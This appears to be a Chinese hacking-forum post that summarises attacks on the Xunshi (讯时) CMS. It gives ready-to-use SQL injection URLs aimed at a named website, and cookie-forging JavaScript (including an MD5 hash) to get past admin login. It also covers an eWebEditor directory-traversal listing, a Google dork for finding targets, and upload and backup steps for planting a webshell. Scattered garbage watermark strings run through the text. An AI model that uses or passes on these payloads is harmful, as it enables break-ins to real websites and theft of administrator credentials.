讯时漏洞总结

admin

by:血封忆尘
3 {" q+ F6 t  S0 W) X0 Y; d# p
在网上也有什么讯时三板斧的文章..但我个人觉得有时候靠那三种还是入侵不了（随着版本的更新）

以下本文总结来自黑防去年第9期杂志上的内容...

4 C" W! g2 N  ~& M6 Y! I4 ?先说一个注入吧:http://www.political-security.com/news_more.asp?lm=2 %41nd 1=2 union %53elect 1,2,3,0x3b%
& K0 c7 F# R/ z. F+ c
26user,0x3b%26pass,6,7,8 %46rom %41dmin union %53elect * %46rom lm where 1=2

$ T1 z% h. `$ r8 a% e' F, K记得千万别多了空格，我测试站的时候就发现多了空格注入不出结果的情况
1 s; m& h; ^7 y3 f0 V这里一个注入

效果如图:
; C, t2 b& g: N8 c

& j* p8 U, {: c5 w6 M$ n
8 L0 a( @  S' Y6 T这样就很轻松可以得到管理用户名与密码..这里md5可以拿去破解.但是现在安全意识的提高.
9 }+ N/ _+ ~0 O' E
! E) Y7 C. t5 o7 ~' x密码复杂了..很难破出来..那么我们可以通过后来cookies欺骗进去

javascript:alert(document.cookie="adminuser="+escape("用户名"));javascript:alert(document.cookie="adminpass="+escape("md5值")); javascript:alert(document.cookie="admindj="+escape("1"));
  m% g' f% J7 x8 v8 l4 b; J; g  A
那么这里就会出现一种情况了..如果后台找不到咋办呢??请看下一漏洞让你更轻松达到你想要的效果:
% J' V  ~% v# m$ h( J3 v# h% w6 E8 _
0 i! o2 o) S. F因为讯时结合了ewebeditor程序..而它没有在处理的时候忽视了ewebeditor有个可以列目录的漏洞

% n! [& ^6 S! ?1 U它是做了验证的..但讯时最没做好的地方就是验证..我们可以通过cookies欺骗来绕过验证.从而可以
- W0 p+ y: e, n/ ^
访问这页面来列目录..步骤如下:

3 V) M- W7 g* d. O. R; ijavascript:alert(document.cookie="admindj=1")

http://www.political-security.co ... asp?id=46&dir=../..

效果如图:

2 S$ e( T; ^+ e
* F& ^. |! r9 P
; E* X" a" B/ ?( p4 w2 Q* R这样全站目录都能瞧了..找到后台目录..进去..

" f$ N3 i6 V1 a7 S$ t; l/ E那么进了后台怎么拿shell？？上传--备份就ok了..
3 L! Y$ P0 O+ r# x6 N1 e# {
& \2 j: p0 Z3 e  L( Z% n那么有时候有些管理在做后台功能的时候把备份页面去掉了...而他本机里备份页面还是存在的..

' ^! |1 F4 k4 j0 D$ W% q/ [* v这个我也碰到过一次..你都可以通过列目录来实现..

  Y- Q4 K4 y7 i2 W) rjavascript:alert(document.cookie="admindj=1")
  E# Y, Q- c+ T( W- U" Q
0 W% ^# A# E9 u; D7 r" Vhttp://www.political-security.co ... p?action=BackupData

) x8 a" G+ a4 }7 Q/ j. B备份ok..

那么以上两个漏洞都被管理封住了...咋办??上面两个是比较常见的..那么下面一个注入漏洞呢?
" g3 o+ G1 t# X) f" h! q
1 X0 g2 G. p; _$ W2 f' }在admin目录下有个admin_lm_edit.asp页面..里面的id没有过滤 那么我们就可以先cookies下

  c2 D$ [8 Q& L- }然后访问此页面进行注入..步骤如下:

! i, T1 \4 j! G' @: }  e; tjavascript:alert(document.cookie="adminuser=admin");alert(document.cookie="admindj=1")

然后请求admin/admin_chk.asp页面

: c2 b) k: t1 l4 U输入注入语句admin/admin_lm_edit.asp?id=1 %41nd 1=2 union %53elect 1,2,3,4,id%260x3b%

26user%260x3b%26pass,6,7,8%20%46rom%20%41dmin

( g6 p3 e. R$ L. V, P4 d6 F) ^效果如图所示:



' @: h1 d; z3 y! a0 _) q" p讯时漏洞2
) V- [& S, G% ]# }/ j; Cgoogle关键字：inurl:news_more.asp?lm2= （关键字很多的自己定义吧）

1、/admin/admin_news_pl_view.asp?id=1
//id任意 填入以下语句
0 U' v+ {4 L/ _6 ~6 G0 @$ g  C* W
2、有时1显示错误信息的时候继续往后退2，3，4，我退到11才找到了页面，郁闷！

. H+ g2 A% W$ B0 A* A3 h5 ]0 h
2 I6 e: ?& \' ?# k- a9 `0 P3 x0 s
& U& I  \. _8 @1 G& x8 l% L, U& e( J3、|'+dfirst("[user]","[admin]")+chr(124)+dfirst("[pass]","[admin]"),username='
! O  F* y1 G- d/ v) k0 o
* V$ F4 a* f# ^7 h

; B) n  I/ J9 I' }6 Q7 p2 X爆出管理员帐号和密码了


; |6 V- V8 c+ X( F
( h' x/ E( Q* U' K- L5 E4、cookies进后台

javascript:alert(document.cookie="adminuser=" + escape("admin"));alert(document.cookie="adminpass=" + escape("480d6d6b4d57cc903f3bab877248da40"));
9 g' b$ A* f0 \/ }5 V8 {/ L8 t
* y6 P  S% z! D! e  t$ a

7 v3 f# N, }( o0 {$ h! k6 M5、后台用了cookie验证，直接访问http://www.political-security.com/admin/admin_index.asp就OK了！
7 x$ T. s( V# Q- {3 e


2 t; A4 I, U4 v; r: `6、后台有上传和备份取SHELL不难。
1 D. p" F2 X' K' t" o" `) _
7、讯时还有个列目录漏洞：http://www.political-security.co ... asp?id=46&dir=../..

/ \8 |% X! i# v4 ?, K逍遥复仇：我搞了一个讯时cms4.1版本的没有数据库备份不知道怎么搞SHELL，有的说虽然后台显示但备份页面是存在的，登录后台后访问 http://www.political-security.com/admin/admin_db_backup.asp?action=BackupData，我这个没有，郁闷着呢，谁还有其他办法提供一下，谢谢！
- o& j: r! J" M8 u


; @: w* y4 M, t- n) q7 }